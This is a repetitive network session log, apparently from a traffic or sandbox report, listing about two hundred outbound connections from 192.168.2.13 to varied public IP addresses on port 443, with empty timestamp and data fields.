                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18564192.168.2.1335452117.113.124.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18565192.168.2.133320254.113.65.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18566192.168.2.1351694152.173.20.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18567192.168.2.134716095.111.133.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18568192.168.2.135427620.111.53.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18569192.168.2.134143820.121.201.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18570192.168.2.1345402199.167.6.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18571192.168.2.135763666.177.156.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18572192.168.2.1341078180.131.28.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18573192.168.2.135646891.205.41.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18574192.168.2.133316814.183.177.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18575192.168.2.135329617.100.67.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18576192.168.2.135430643.39.35.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18577192.168.2.1336046175.201.139.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18578192.168.2.136071819.73.232.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18579192.168.2.1359780110.35.63.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18580192.168.2.1347114132.83.38.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18581192.168.2.1344426133.250.35.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18582192.168.2.135850268.138.197.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18583192.168.2.1341046209.90.18.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18584192.168.2.1358690154.142.137.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18585192.168.2.133805037.203.6.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18586192.168.2.1351102105.3.118.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18587192.168.2.1346048117.37.81.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18588192.168.2.1339738181.212.173.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18589192.168.2.133553873.192.220.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18590192.168.2.134153637.152.46.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18591192.168.2.135266419.134.195.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18592192.168.2.1348928199.16.107.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18593192.168.2.136009646.217.105.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18594192.168.2.1341914221.228.236.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18595192.168.2.1345914216.133.225.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18596192.168.2.1342006177.207.88.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18597192.168.2.1342668119.96.62.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18598192.168.2.134639454.67.53.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18599192.168.2.1333612189.233.172.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18600192.168.2.1352688180.160.227.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18601192.168.2.1359520221.93.170.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18602192.168.2.133930840.133.179.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18603192.168.2.1348528131.6.244.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18604192.168.2.1344230104.152.167.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18605192.168.2.133459651.49.113.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18606192.168.2.1336856143.236.230.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18607192.168.2.1346090159.92.123.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18608192.168.2.135666298.155.5.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18609192.168.2.135180039.251.20.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18610192.168.2.1341594142.201.110.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18611192.168.2.13493224.103.46.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18612192.168.2.134959277.39.123.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18613192.168.2.133656654.96.114.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18614192.168.2.1345628168.244.242.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18615192.168.2.1338270219.145.225.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18616192.168.2.1339240178.128.190.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18617192.168.2.133672219.56.136.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18618192.168.2.1359066116.41.43.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18619192.168.2.1350132128.180.17.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18620192.168.2.1356604210.179.160.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18621192.168.2.134673667.207.175.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18622192.168.2.1351458198.114.144.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18623192.168.2.1338978171.36.52.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18624192.168.2.1340878110.133.193.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18625192.168.2.1343272177.247.149.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18626192.168.2.1349732138.142.212.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18627192.168.2.1339406126.107.141.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18628192.168.2.1349870142.85.235.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18629192.168.2.1348350102.130.200.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18630192.168.2.135573251.84.197.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18631192.168.2.1335056114.39.211.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18632192.168.2.1352312170.35.132.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18633192.168.2.134512870.20.120.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18634192.168.2.133402468.31.37.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18635192.168.2.1349140158.124.14.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18636192.168.2.135356861.206.21.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18637192.168.2.135337812.184.61.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18638192.168.2.1342896136.205.251.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18639192.168.2.1352634206.173.135.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18640192.168.2.133898227.254.222.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18641192.168.2.1338044105.3.212.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18642192.168.2.133995836.200.147.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18643192.168.2.1340428176.189.55.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18644192.168.2.1348282184.39.238.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18645192.168.2.1334262184.233.39.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18646192.168.2.1340634141.223.61.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18647192.168.2.134623897.174.108.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18648192.168.2.134329425.39.202.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18649192.168.2.1355796143.28.127.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18650192.168.2.1358242155.163.203.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18651192.168.2.1346344160.98.214.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18652192.168.2.1335402176.51.105.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18653192.168.2.134452031.175.165.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18654192.168.2.134251259.64.101.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18655192.168.2.1339652110.121.142.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18656192.168.2.13575568.92.43.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18657192.168.2.133278643.29.14.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18658192.168.2.1343082180.83.190.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18659192.168.2.1358954110.59.241.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18660192.168.2.135213673.179.39.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18661192.168.2.133655836.219.244.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18662192.168.2.1358022181.89.67.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18663192.168.2.1345930118.61.206.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18664192.168.2.13552488.202.99.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18665192.168.2.135340684.149.72.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18666192.168.2.133430451.106.101.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18667192.168.2.1338964119.162.245.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18668192.168.2.1333558154.47.72.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18669192.168.2.1347866133.10.135.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18670192.168.2.1359794181.223.30.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18671192.168.2.1346432100.247.237.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18672192.168.2.135975617.149.53.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18673192.168.2.1353796154.38.122.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18674192.168.2.1338372131.232.52.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18675192.168.2.134675249.63.97.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18676192.168.2.1357184209.184.30.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18677192.168.2.1346342141.203.86.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18678192.168.2.13368741.100.56.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18679192.168.2.1342132208.0.150.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18680192.168.2.1352736210.228.89.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18681192.168.2.1360618158.74.79.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18682192.168.2.1336210186.110.249.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18683192.168.2.133595260.157.143.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18684192.168.2.1335590186.43.206.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18685192.168.2.1333728142.213.214.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18686192.168.2.134603290.165.6.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18687192.168.2.135858689.41.179.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18688192.168.2.1335152191.191.101.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18689192.168.2.13573409.129.97.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18690192.168.2.1354902135.38.103.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18691192.168.2.134595279.163.199.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18692192.168.2.1350546196.191.221.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18693192.168.2.1357748104.123.236.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18694192.168.2.133637088.110.59.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18695192.168.2.1355428222.25.118.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18696192.168.2.1339132175.232.5.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18697192.168.2.136025893.88.12.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18698192.168.2.1343160141.242.104.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18699192.168.2.1354262151.49.76.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18700192.168.2.135397869.186.185.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18701192.168.2.1338950183.0.253.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18702192.168.2.133792467.231.234.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18703192.168.2.1352404156.76.33.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18704192.168.2.1344450112.66.129.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18705192.168.2.133517882.227.224.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18706192.168.2.1354610160.132.51.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18707192.168.2.13329621.109.89.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18708192.168.2.1360004140.219.175.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18709192.168.2.1355102193.54.62.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18710192.168.2.1358504160.231.86.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18711192.168.2.1350196167.199.43.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18712192.168.2.135851070.210.229.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18713192.168.2.134839847.182.148.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18714192.168.2.1355166143.221.135.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18715192.168.2.1357546121.56.39.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18716192.168.2.1333278192.108.16.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18717192.168.2.133548258.67.37.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18718192.168.2.1335324180.120.46.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18719192.168.2.1354924110.56.237.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18720192.168.2.1358478130.212.47.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18721192.168.2.1337762150.240.119.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18722192.168.2.1346148165.169.98.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18723192.168.2.1357216141.152.9.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18724192.168.2.1339846185.49.56.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18725192.168.2.1354978139.234.68.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18726192.168.2.1352950158.87.178.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18727192.168.2.1336692130.84.202.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18728192.168.2.1334930109.220.252.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18729192.168.2.1358922133.48.46.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18730192.168.2.1337934169.181.23.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18731192.168.2.13515902.139.94.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18732192.168.2.134905245.137.109.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18733192.168.2.1345562122.1.73.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18734192.168.2.1357922152.20.32.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18735192.168.2.1342058109.47.72.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18736192.168.2.136048494.240.49.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18737192.168.2.135121017.204.30.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18738192.168.2.1342794139.177.222.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18739192.168.2.134596243.172.118.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18740192.168.2.1346576161.201.209.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18741192.168.2.134675825.100.92.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18742192.168.2.135587857.209.151.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18743192.168.2.1348960154.4.195.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18744192.168.2.135998846.132.106.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18745192.168.2.134403278.161.205.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18746192.168.2.1357962193.143.238.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18747192.168.2.1338448140.137.120.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18748192.168.2.1339946155.67.237.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18749192.168.2.133851413.153.30.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18750192.168.2.1344056176.135.218.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18751192.168.2.1348488186.94.66.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18752192.168.2.133605653.9.9.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18753192.168.2.133786465.111.5.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18754192.168.2.13362745.196.48.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18755192.168.2.135662294.149.124.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18756192.168.2.1338640149.173.205.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18757192.168.2.1348458172.145.51.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18758192.168.2.135812844.159.45.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18759192.168.2.1354198197.23.238.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18760192.168.2.1345616172.116.54.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18761192.168.2.1355616109.165.34.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18762192.168.2.1348226179.134.5.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18763192.168.2.1356300187.11.88.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18764192.168.2.133812080.196.50.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18765192.168.2.135484612.228.220.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18766192.168.2.133953679.178.251.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18767192.168.2.136055066.113.102.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18768192.168.2.133841895.78.246.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18769192.168.2.134677693.175.201.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18770192.168.2.133997014.121.99.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18771192.168.2.1352392140.86.83.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18772192.168.2.1339202188.94.157.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18773192.168.2.13596248.248.40.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18774192.168.2.133588268.222.106.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18775192.168.2.1355476191.217.237.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
